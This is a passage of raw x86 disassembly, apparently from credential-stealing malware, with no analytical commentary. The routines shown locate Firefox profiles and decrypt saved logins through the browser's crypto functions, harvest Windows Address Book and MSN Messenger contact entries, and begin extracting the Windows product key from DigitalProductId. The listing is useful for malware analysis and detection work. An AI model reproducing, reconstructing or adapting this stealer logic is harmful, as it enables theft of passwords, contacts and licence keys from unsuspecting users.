jmp short loc_42488F
; ---------------------------------------------------------------------------
loc_424888: ; CODE XREF: sub_424699+1A6�j
; sub_424699+1AE�j ...
call sub_4248BB
loc_42488D: ; CODE XREF: sub_424699+10E�j
; sub_424699+116�j
xor eax, eax
loc_42488F: ; CODE XREF: sub_424699+1ED�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_424699 endp
; =============== S U B R O U T I N E =======================================
sub_424894 proc near ; CODE XREF: sub_424FC9+109�p
arg_0 = dword ptr 4
push [esp+arg_0]
and dword_67379C, 0
call dword_67377C
test eax, eax
pop ecx
jz short loc_4248B2
call sub_4248BB
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4248B2: ; CODE XREF: sub_424894+14�j
xor eax, eax
inc eax
mov dword_67379C, eax
retn
sub_424894 endp
; =============== S U B R O U T I N E =======================================
sub_4248BB proc near ; CODE XREF: sub_424699:loc_424888�p
; sub_424894+16�p
cmp dword_67379C, 0
jz short loc_4248CF
mov eax, dword_673780
test eax, eax
jz short loc_4248CF
call eax ; dword_673780
loc_4248CF: ; CODE XREF: sub_4248BB+7�j
; sub_4248BB+10�j
mov eax, dword_6737A0
push esi
mov esi, dword_437038
test eax, eax
jz short loc_4248E2
push eax
call esi ; dword_437038
loc_4248E2: ; CODE XREF: sub_4248BB+22�j
mov eax, dword_6737A4
test eax, eax
jz short loc_4248EE
push eax
call esi ; dword_437038
loc_4248EE: ; CODE XREF: sub_4248BB+2E�j
pop esi
retn
sub_4248BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4248F0 proc near ; CODE XREF: sub_424A42+189�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
lea ecx, [ebp+var_10]
cmp [eax], bl
push esi
mov [ebp+var_10], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
push ecx
jz short loc_42497A
lea ecx, [ebp+var_8]
push ecx
push eax
call sub_424990
add esp, 0Ch
test eax, eax
jz short loc_424976
cmp [ebp+var_8], ebx
jz short loc_424976
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_8]
call sub_4249E3
add esp, 10h
test eax, eax
jz short loc_424976
cmp [ebp+var_C], ebx
jz short loc_424976
mov eax, [ebp+var_4]
inc eax
push eax
call sub_4296E8
mov esi, [ebp+arg_4]
cmp eax, ebx
pop ecx
mov [esi], eax
jz short loc_424976
push [ebp+var_4]
push [ebp+var_C]
push eax
call sub_429350
mov eax, [esi]
mov ecx, [ebp+var_4]
add esp, 0Ch
mov [ecx+eax], bl
xor eax, eax
inc eax
jmp short loc_42498C
; ---------------------------------------------------------------------------
loc_424976: ; CODE XREF: sub_4248F0+30�j
; sub_4248F0+35�j ...
xor eax, eax
jmp short loc_42498C
; ---------------------------------------------------------------------------
loc_42497A: ; CODE XREF: sub_4248F0+1F�j
push [ebp+arg_4]
push eax
call sub_424990
add esp, 0Ch
neg eax
sbb eax, eax
neg eax
loc_42498C: ; CODE XREF: sub_4248F0+84�j
; sub_4248F0+88�j
pop esi
pop ebx
leave
retn
sub_4248F0 endp
; =============== S U B R O U T I N E =======================================
sub_424990 proc near ; CODE XREF: sub_4248F0+26�p
; sub_4248F0+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_0]
push edi
call sub_4292D0
mov esi, eax
xor ebx, ebx
pop ecx
cmp byte ptr [esi+edi-1], 3Dh
jnz short loc_4249B4
inc ebx
cmp byte ptr [esi+edi-2], 3Dh
jnz short loc_4249B4
push 2
pop ebx
loc_4249B4: ; CODE XREF: sub_424990+17�j
; sub_424990+1F�j
push 0
push esi
push edi
call dword_673798
mov ecx, [esp+18h+arg_4]
add esp, 0Ch
test eax, eax
mov [ecx], eax
jz short loc_4249DF
lea eax, [esi+esi*2]
push 4
cdq
pop ecx
idiv ecx
mov ecx, [esp+0Ch+arg_8]
sub eax, ebx
mov [ecx], eax
xor eax, eax
inc eax
loc_4249DF: ; CODE XREF: sub_424990+39�j
pop edi
pop esi
pop ebx
retn
sub_424990 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4249E3 proc near ; CODE XREF: sub_4248F0+45�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push esi
call dword_673784
mov esi, eax
xor eax, eax
cmp esi, eax
jz short loc_424A20
mov ecx, [ebp+arg_0]
mov [ebp+var_8], eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_C]
mov [ebp+var_14], ecx
mov ecx, [ebp+arg_4]
push eax
lea eax, [ebp+var_18]
mov [ebp+var_10], ecx
push eax
call dword_673794
add esp, 0Ch
test eax, eax
jz short loc_424A24
loc_424A20: ; CODE XREF: sub_4249E3+13�j
xor eax, eax
jmp short loc_424A3F
; ---------------------------------------------------------------------------
loc_424A24: ; CODE XREF: sub_4249E3+3B�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_8]
push esi
mov [eax], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
call dword_67378C
xor eax, eax
pop ecx
inc eax
loc_424A3F: ; CODE XREF: sub_4249E3+3F�j
pop esi
leave
retn
sub_4249E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424A42 proc near ; CODE XREF: sub_424FC9+131�p
; sub_424FC9+154�p ...
var_A008 = byte ptr -0A008h
var_7808 = byte ptr -7808h
var_5008 = byte ptr -5008h
var_2808 = byte ptr -2808h
var_2807 = byte ptr -2807h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 0A008h
call sub_429A90
push ebx
push esi
mov esi, [ebp+arg_4]
xor eax, eax
cmp esi, offset dword_4503AC
mov [ebp+var_8], eax
mov [ebp+var_4], eax
jnz short loc_424A6B
mov [ebp+var_4], 1
loc_424A6B: ; CODE XREF: sub_424A42+20�j
cmp esi, offset dword_45039C
jnz short loc_424A7A
mov [ebp+var_4], 2
loc_424A7A: ; CODE XREF: sub_424A42+2F�j
cmp esi, offset dword_45038C
jnz short loc_424A89
mov [ebp+var_4], 3
loc_424A89: ; CODE XREF: sub_424A42+3E�j
cmp [ebp+arg_0], eax
jz loc_424C96
cmp esi, eax
jz loc_424C96
push [ebp+arg_0]
lea eax, [ebp+var_5008]
push eax
call dword_4370A4 ; lstrcpyA
mov ebx, dword_437090
lea eax, [ebp+var_5008]
push offset asc_44DA9C ; "\\"
push eax
call ebx ; dword_437090
lea eax, [ebp+var_5008]
push esi
push eax
call ebx ; dword_437090
lea eax, [ebp+var_5008]
push eax
call sub_424524
test eax, eax
pop ecx
jz loc_424C96
push edi
mov edi, 2800h
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
add esp, 10h
jmp short loc_424B2B
; ---------------------------------------------------------------------------
loc_424B02: ; CODE XREF: sub_424A42+EB�j
lea eax, [ebp+var_2808]
push eax
call sub_4292D0
test eax, eax
pop ecx
jz short loc_424B1C
cmp [ebp+var_2808], 2Eh
jz short loc_424B2F
loc_424B1C: ; CODE XREF: sub_424A42+CF�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
pop ecx
pop ecx
loc_424B2B: ; CODE XREF: sub_424A42+BE�j
test eax, eax
jnz short loc_424B02
loc_424B2F: ; CODE XREF: sub_424A42+D8�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
pop ecx
test eax, eax
pop ecx
jz loc_424C90
mov esi, offset aS_5 ; "%s"
loc_424B4B: ; CODE XREF: sub_424A42+248�j
lea eax, [ebp+var_2808]
push eax
lea eax, [ebp+var_7808]
push [ebp+var_4]
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push offset dword_45036C
push edi
push eax
call sub_429AEE
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
add esp, 20h
jmp loc_424C22
; ---------------------------------------------------------------------------
loc_424B81: ; CODE XREF: sub_424A42+1E2�j
cmp [ebp+var_2808], 2Eh
jz loc_424C2A
cmp [ebp+var_2808], 2Ah
lea eax, [ebp+var_2807]
jz short loc_424BA3
lea eax, [ebp+var_2808]
loc_424BA3: ; CODE XREF: sub_424A42+159�j
push eax
lea eax, [ebp+var_A008]
push eax
call dword_4370A4 ; lstrcpyA
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
pop ecx
lea eax, [ebp+var_8]
pop ecx
push eax
lea eax, [ebp+var_2808]
push eax
call sub_4248F0
pop ecx
cmp eax, 1
pop ecx
jnz short loc_424C13
lea eax, [ebp+var_A008]
push eax
lea eax, [ebp+var_7808]
push eax
call ebx ; dword_437090
lea eax, [ebp+var_7808]
push offset asc_450368 ; ": "
push eax
call ebx ; dword_437090
push [ebp+var_8]
lea eax, [ebp+var_7808]
push eax
call ebx ; dword_437090
lea eax, [ebp+var_7808]
push offset asc_43D938 ; " "
push eax
call ebx ; dword_437090
and [ebp+var_8], 0
loc_424C13: ; CODE XREF: sub_424A42+193�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
pop ecx
pop ecx
loc_424C22: ; CODE XREF: sub_424A42+13A�j
test eax, eax
jnz loc_424B81
loc_424C2A: ; CODE XREF: sub_424A42+146�j
lea eax, [ebp+var_7808]
cmp [ebp+arg_10], 0
push eax
push esi
push [ebp+arg_14]
push [ebp+arg_8]
push [ebp+arg_C]
jnz short loc_424C48
call sub_41CE86
jmp short loc_424C4D
; ---------------------------------------------------------------------------
loc_424C48: ; CODE XREF: sub_424A42+1FD�j
call sub_41CF1A
loc_424C4D: ; CODE XREF: sub_424A42+204�j
add esp, 14h
cmp [ebp+arg_18], 0
jnz short loc_424C79
cmp [ebp+arg_10], 0
lea eax, [ebp+var_7808]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_C]
jnz short loc_424C71
call sub_41CD84
jmp short loc_424C76
; ---------------------------------------------------------------------------
loc_424C71: ; CODE XREF: sub_424A42+226�j
call sub_41CD0E
loc_424C76: ; CODE XREF: sub_424A42+22D�j
add esp, 10h
loc_424C79: ; CODE XREF: sub_424A42+212�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_42459D
pop ecx
test eax, eax
pop ecx
jnz loc_424B4B
loc_424C90: ; CODE XREF: sub_424A42+FE�j
xor eax, eax
pop edi
inc eax
jmp short loc_424C98
; ---------------------------------------------------------------------------
loc_424C96: ; CODE XREF: sub_424A42+4A�j
; sub_424A42+52�j ...
xor eax, eax
loc_424C98: ; CODE XREF: sub_424A42+252�j
pop esi
pop ebx
leave
retn
sub_424A42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424C9C proc near ; CODE XREF: sub_424FC9+E7�p
var_154 = byte ptr -154h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 154h
push ebx
push esi
push edi
push 10h
pop ecx
mov esi, offset aSoftwareClient ; "SOFTWARE\\Clients\\StartMenuInternet\\fire"...
lea edi, [ebp+var_154]
mov al, byte_454A34
rep movsd
movsw
push 40h
mov [ebp+var_110], al
pop ecx
xor eax, eax
lea edi, [ebp+var_10F]
xor ebx, ebx
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
mov [ebp+var_8], 104h
push eax
push 20019h
lea eax, [ebp+var_154]
push ebx
push eax
push 80000002h
call dword_437004 ; RegOpenKeyExA
test eax, eax
jnz loc_424DDB
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push [ebp+var_4]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz loc_424DD2
cmp [ebp+var_8], ebx
jbe loc_424DD2
cmp [ebp+var_110], bl
jz loc_424DD2
push [ebp+var_4]
call dword_437000 ; RegCloseKey
cmp [ebp+var_110], 22h
jnz short loc_424D7E
lea eax, [ebp+var_110]
xor esi, esi
loc_424D53: ; DATA XREF: .text:0043DA6C�o
push eax
call sub_4292D0
dec eax
pop ecx
jz short loc_424D7E
loc_424D5D: ; CODE XREF: sub_424C9C+E0�j
mov al, [ebp+esi+var_10F]
mov [ebp+esi+var_110], al
lea eax, [ebp+var_110]
push eax
inc esi
call sub_4292D0
dec eax
pop ecx
cmp esi, eax
jb short loc_424D5D
loc_424D7E: ; CODE XREF: sub_424C9C+AD�j
; sub_424C9C+BF�j
lea eax, [ebp+var_110]
push eax
call sub_4292D0
pop ecx
jmp short loc_424D97
; ---------------------------------------------------------------------------
loc_424D8D: ; CODE XREF: sub_424C9C+FE�j
cmp [ebp+eax+var_110], 5Ch
jz short loc_424D9E
loc_424D97: ; CODE XREF: sub_424C9C+EF�j
dec eax
cmp eax, ebx
jg short loc_424D8D
jmp short loc_424DA5
; ---------------------------------------------------------------------------
loc_424D9E: ; CODE XREF: sub_424C9C+F9�j
mov [ebp+eax+var_110], bl
loc_424DA5: ; CODE XREF: sub_424C9C+100�j
lea eax, [ebp+var_110]
push eax
call sub_4292D0
inc eax
push eax
call sub_4296E8
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_424DCE
lea eax, [ebp+var_110]
push eax
push esi
call dword_4370A4 ; lstrcpyA
loc_424DCE: ; CODE XREF: sub_424C9C+122�j
mov eax, esi
jmp short loc_424DDD
; ---------------------------------------------------------------------------
loc_424DD2: ; CODE XREF: sub_424C9C+82�j
; sub_424C9C+8B�j ...
push [ebp+var_4]
call dword_437000 ; RegCloseKey
loc_424DDB: ; CODE XREF: sub_424C9C+60�j
xor eax, eax
loc_424DDD: ; CODE XREF: sub_424C9C+134�j
pop edi
pop esi
pop ebx
leave
retn
sub_424C9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424DE2 proc near ; CODE XREF: sub_424FC9:loc_42509A�p
var_64C = dword ptr -64Ch
var_63D = byte ptr -63Dh
var_63C = byte ptr -63Ch
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_137 = byte ptr -137h
var_34 = byte ptr -34h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 63Ch
mov al, byte_454A34
push ebx
push esi
push edi
push 40h
mov [ebp+var_138], al
pop ecx
xor eax, eax
lea edi, [ebp+var_137]
push 8
rep stosd
stosw
stosb
pop ecx
mov esi, offset aApplicationDat ; "Application Data\\Mozilla\\Firefox"
lea edi, [ebp+var_34]
lea eax, [ebp+var_C]
rep movsd
xor ebx, ebx
push eax
push 8
mov [ebp+var_10], 104h
movsb
mov [ebp+var_4], ebx
call dword_43704C ; GetCurrentProcess
push eax
call dword_437010 ; OpenProcessToken
test eax, eax
jz short loc_424EB0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_C]
call dword_43727C
test eax, eax
jz short loc_424EB0
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_23C]
push eax
call dword_4370A4 ; lstrcpyA
mov esi, dword_437090
mov edi, offset asc_44DA9C ; "\\"
lea eax, [ebp+var_23C]
push edi
push eax
call esi ; dword_437090
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_23C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_23C]
push offset aProfiles_ini ; "\\profiles.ini"
push eax
call esi ; dword_437090
lea eax, [ebp+var_23C]
push offset word_43EF70
push eax
call sub_42A43C
pop ecx
mov [ebp+var_8], eax
test eax, eax
pop ecx
jnz short loc_424EB7
loc_424EB0: ; CODE XREF: sub_424DE2+56�j
; sub_424DE2+6E�j
xor eax, eax
jmp loc_424FC4
; ---------------------------------------------------------------------------
loc_424EB7: ; CODE XREF: sub_424DE2+CC�j
push eax
jmp short loc_424F01
; ---------------------------------------------------------------------------
loc_424EBA: ; CODE XREF: sub_424DE2+135�j
lea eax, [ebp+var_63C]
push eax
call sub_4245FB
cmp [ebp+var_4], 0
pop ecx
lea eax, [ebp+var_63C]
jnz short loc_424EED
push offset aNameDefault ; "name=default"
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_424EFE
mov [ebp+var_4], 1
jmp short loc_424EFE
; ---------------------------------------------------------------------------
loc_424EED: ; CODE XREF: sub_424DE2+EF�j
push offset aPath_0 ; "path="
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_424F1E
loc_424EFE: ; CODE XREF: sub_424DE2+100�j
; sub_424DE2+109�j
push [ebp+var_8]
loc_424F01: ; CODE XREF: sub_424DE2+D6�j
lea eax, [ebp+var_63C]
push 400h
push eax
call sub_42AFB7
add esp, 0Ch
test eax, eax
jnz short loc_424EBA
jmp loc_424FB9
; ---------------------------------------------------------------------------
loc_424F1E: ; CODE XREF: sub_424DE2+11A�j
lea eax, [ebp+var_63C]
push offset asc_446DD8 ; "/"
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_424F38
mov byte ptr [eax], 5Ch
loc_424F38: ; CODE XREF: sub_424DE2+151�j
lea eax, [ebp+var_63C]
push eax
call sub_4292D0
and [ebp+eax+var_63D], 0
lea eax, [ebp+var_63C]
mov [esp+64Ch+var_64C], offset asc_44734C ; "="
push eax
call sub_42ADD0
push eax
mov [ebp+var_4], eax
call sub_4292D0
mov ebx, eax
lea eax, [ebp+var_34]
push eax
call sub_4292D0
add ebx, eax
lea eax, [ebp+var_138]
push eax
call sub_4292D0
lea eax, [ebx+eax+3]
push eax
call sub_4296E8
mov ebx, eax
add esp, 18h
test ebx, ebx
jz short loc_424FB9
lea eax, [ebp+var_138]
push eax
push ebx
call dword_4370A4 ; lstrcpyA
push edi
push ebx
call esi ; dword_437090
lea eax, [ebp+var_34]
push eax
push ebx
call esi ; dword_437090
push edi
push ebx
call esi ; dword_437090
mov eax, [ebp+var_4]
inc eax
push eax
push ebx
call esi ; dword_437090
loc_424FB9: ; CODE XREF: sub_424DE2+137�j
; sub_424DE2+1B0�j
push [ebp+var_8]
call sub_42A03B
pop ecx
mov eax, ebx
loc_424FC4: ; CODE XREF: sub_424DE2+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_424DE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424FC9 proc near ; DATA XREF: sub_40A938+1389�o
var_28E4 = byte ptr -28E4h
var_1D4 = byte ptr -1D4h
var_D0 = dword ptr -0D0h
var_CC = byte ptr -0CCh
var_48 = dword ptr -48h
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28E4h
call sub_429A90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_D0]
rep movsd
mov esi, dword_437004
mov dword ptr [eax+0BCh], 1
and [ebp+var_8], 0
lea eax, [ebp+arg_0]
mov ebx, 20019h
push eax
push ebx
push 0
mov edi, 80000002h
push offset aSoftwareMozill ; "SOFTWARE\\Mozilla\\Mozilla Firefox"
push edi
mov [ebp+var_4], 104h
call esi ; dword_437004
test eax, eax
jz short loc_425038
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push offset aSoftwareMozi_0 ; "SOFTWARE\\mozilla.org\\Mozilla"
push edi
call esi ; dword_437004
test eax, eax
jnz loc_42514D
loc_425038: ; CODE XREF: sub_424FC9+56�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_C]
push eax
push 0
push offset aCurrentversion ; "CurrentVersion"
push [ebp+arg_0]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz short loc_425075
cmp [ebp+var_4], eax
ja short loc_42506C
cmp [ebp+var_1D4], al
jz loc_42514D
loc_42506C: ; CODE XREF: sub_424FC9+95�j
push [ebp+arg_0]
call dword_437000 ; RegCloseKey
loc_425075: ; CODE XREF: sub_424FC9+90�j
cmp [ebp+var_48], 0
jz short loc_425097
push 2710h
lea eax, [ebp+var_28E4]
push [ebp+var_48]
xor edi, edi
inc edi
push eax
call sub_429C40
add esp, 0Ch
jmp short loc_42509A
; ---------------------------------------------------------------------------
loc_425097: ; CODE XREF: sub_424FC9+B0�j
mov edi, [ebp+var_8]
loc_42509A: ; CODE XREF: sub_424FC9+CC�j
call sub_424DE2
mov esi, eax
push esi
call sub_4245E7
test eax, eax
pop ecx
jz loc_42514D
call sub_424C9C
mov ebx, eax
push ebx
call sub_4245E7
test eax, eax
pop ecx
jz loc_42514D
push ebx
call sub_424699
test eax, eax
pop ecx
jz short loc_425148
push esi
call sub_424894
test eax, eax
pop ecx
jz short loc_425148
lea eax, [ebp+var_28E4]
push edi
push eax
lea eax, [ebp+var_CC]
push [ebp+var_18]
push [ebp+var_D0]
push eax
push offset dword_4503AC
push esi
call sub_424A42
lea eax, [ebp+var_28E4]
push edi
push eax
lea eax, [ebp+var_CC]
push [ebp+var_18]
push [ebp+var_D0]
push eax
push offset dword_45039C
push esi
call sub_424A42
lea eax, [ebp+var_28E4]
push edi
push eax
lea eax, [ebp+var_CC]
push [ebp+var_18]
push [ebp+var_D0]
push eax
push offset dword_45038C
push esi
call sub_424A42
add esp, 54h
loc_425148: ; CODE XREF: sub_424FC9+106�j
; sub_424FC9+111�j
xor eax, eax
inc eax
jmp short loc_42514F
; ---------------------------------------------------------------------------
loc_42514D: ; CODE XREF: sub_424FC9+69�j
; sub_424FC9+9D�j ...
xor eax, eax
loc_42514F: ; CODE XREF: sub_424FC9+182�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_424FC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425156 proc near ; DATA XREF: sub_40A938+1197�o
var_794 = byte ptr -794h
var_394 = byte ptr -394h
var_290 = byte ptr -290h
var_24C = byte ptr -24Ch
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = byte ptr -0E0h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 794h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_E4]
rep movsd
xor edi, edi
xor ebx, ebx
inc edi
mov [ebp+var_1C], 320h
mov [eax+0BCh], edi
mov eax, [ebp+var_E4]
mov [ebp+arg_0], eax
lea eax, [ebp+var_C]
push eax
push 0F003Fh
push ebx
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\WAB\\WAB4\\Wab File Na"...
push 80000001h
call dword_437004 ; RegOpenKeyExA
cmp [ebp+var_C], ebx
jnz short loc_4251B3
loc_4251AC: ; CODE XREF: sub_425156+BD�j
; sub_425156+E1�j
mov eax, edi
jmp loc_4253B9
; ---------------------------------------------------------------------------
loc_4251B3: ; CODE XREF: sub_425156+54�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_394]
push eax
push ebx
push ebx
push offset byte_454A34
push [ebp+var_C]
call dword_437028 ; RegQueryValueExA
push [ebp+var_C]
call dword_437000 ; RegCloseKey
push ebx
push 80h
push 4
push ebx
push edi
lea eax, [ebp+var_394]
push 80000000h
push eax
call dword_43705C ; CreateFileA
push ebx
push ebx
push ebx
push 2
push ebx
push eax
mov [ebp+var_4], eax
call dword_4370B8 ; CreateFileMappingA
cmp eax, ebx
mov [ebp+var_10], eax
jnz short loc_425215
push [ebp+var_4]
call dword_437044 ; CloseHandle
jmp short loc_4251AC
; ---------------------------------------------------------------------------
loc_425215: ; CODE XREF: sub_425156+B2�j
push ebx
push ebx
push ebx
push 4
push eax
call dword_437040 ; MapViewOfFile
mov esi, eax
cmp esi, ebx
jnz short loc_42523C
push [ebp+var_10]
mov esi, dword_437044
call esi ; dword_437044
push [ebp+var_4]
call esi ; dword_437044
jmp loc_4251AC
; ---------------------------------------------------------------------------
loc_42523C: ; CODE XREF: sub_425156+CF�j
xor ecx, ecx
xor eax, eax
loc_425240: ; DATA XREF: .text:off_44F8E4�o
mov ch, [esi+63h]
mov ah, [esi+61h]
mov cl, [esi+62h]
movsx edi, byte ptr [esi+64h]
movzx eax, ax
shl ecx, 10h
or ecx, eax
movzx eax, byte ptr [esi+60h]
or ecx, eax
mov eax, edi
imul eax, 44h
cmp eax, ebx
jle short loc_4252C9
add ecx, esi
push 44h
mov [ebp+var_8], ecx
dec eax
xor edx, edx
pop ecx
div ecx
mov edi, eax
inc edi
loc_425274: ; CODE XREF: sub_425156+171�j
mov ecx, [ebp+var_8]
xor eax, eax
loc_425279: ; CODE XREF: sub_425156+132�j
mov dl, [ecx]
inc ecx
mov [ebp+eax+var_290], dl
inc ecx
inc eax
cmp eax, 44h
jle short loc_425279
cmp [ebp+var_2C], ebx
lea eax, [ebp+var_290]
push eax
lea eax, [ebp+var_E0]
push offset aS_5 ; "%s"
push eax
push [ebp+arg_0]
mov [ebp+var_24C], bl
jnz short loc_4252B2
call sub_41CD84
jmp short loc_4252B7
; ---------------------------------------------------------------------------
loc_4252B2: ; CODE XREF: sub_425156+153�j
call sub_41CD0E
loc_4252B7: ; CODE XREF: sub_425156+15A�j
add esp, 10h
push 64h
call dword_43718C ; Sleep
add [ebp+var_8], 44h
dec edi
jnz short loc_425274
loc_4252C9: ; CODE XREF: sub_425156+10C�j
push [ebp+var_4]
mov edi, dword_437044
call edi ; dword_437044
push esi
call dword_437048 ; UnmapViewOfFile
push [ebp+var_10]
call edi ; dword_437044
lea eax, [ebp+var_18]
push eax
push 0F003Fh
push ebx
push offset aSoftwareMicr_3 ; "Software\\Microsoft\\MessengerService\\Lis"...
push 80000001h
call dword_437004 ; RegOpenKeyExA
test eax, eax
jnz loc_4253B6
mov esi, 400h
mov [ebp+var_20], 3
mov [ebp+var_14], esi
mov [ebp+var_4], ebx
mov edi, offset dword_4504A4
loc_425319: ; CODE XREF: sub_425156+252�j
push 80h
lea eax, [ebp+var_164]
push ebx
push eax
call sub_429690
push [ebp+var_4]
lea eax, [ebp+var_164]
push offset aAllowD ; "Allow%d"
push eax
call sub_429A33
inc [ebp+var_4]
push esi
lea eax, [ebp+var_794]
push ebx
push eax
mov [ebp+var_14], esi
call sub_429690
add esp, 24h
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_794]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_164]
push ebx
push eax
push [ebp+var_18]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz short loc_4253AD
cmp [ebp+var_2C], ebx
lea eax, [ebp+var_794]
push eax
lea eax, [ebp+var_E0]
push edi
push eax
push [ebp+arg_0]
jnz short loc_425398
call sub_41CD84
jmp short loc_42539D
; ---------------------------------------------------------------------------
loc_425398: ; CODE XREF: sub_425156+239�j
call sub_41CD0E
loc_42539D: ; CODE XREF: sub_425156+240�j
add esp, 10h
push 64h
call dword_43718C ; Sleep
jmp loc_425319
; ---------------------------------------------------------------------------
loc_4253AD: ; CODE XREF: sub_425156+222�j
push [ebp+var_18]
call dword_437000 ; RegCloseKey
loc_4253B6: ; CODE XREF: sub_425156+1A6�j
xor eax, eax
inc eax
loc_4253B9: ; CODE XREF: sub_425156+58�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_425156 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4253C0 proc near ; CODE XREF: sub_42549F+127�p
var_AC = byte ptr -0ACh
var_78 = byte ptr -78h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0ACh
lea eax, [ebp+var_4]
push esi
push eax
push 20019h
push 3
push offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
xor esi, esi
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz loc_42549A
lea eax, [ebp+var_8]
mov [ebp+var_8], 0A4h
push eax
lea eax, [ebp+var_AC]
push eax
push esi
push esi
push offset aDigitalproduct ; "DigitalProductId"
push [ebp+var_4]
call dword_456DD0 ; RegQueryValueExA
test eax, eax
jnz short loc_425491
push ebx
xor ebx, ebx
cmp [ebp+arg_4], esi
push edi
push 0Fh
lea esi, [ebp+var_78]
setnz bl
pop ecx
lea edi, [ebp+var_AC]
lea ebx, ds:18h[ebx*4]
add ebx, [ebp+arg_0]
mov [ebp+arg_0], 18h
rep movsb
loc_42543E: ; CODE XREF: sub_4253C0+CA�j
push 0Eh
xor eax, eax
pop esi
loc_425443: ; CODE XREF: sub_4253C0+A1�j
lea ecx, [ebp+esi+var_AC]
push 18h
shl eax, 8
movzx edx, byte ptr [ecx]
xor eax, edx
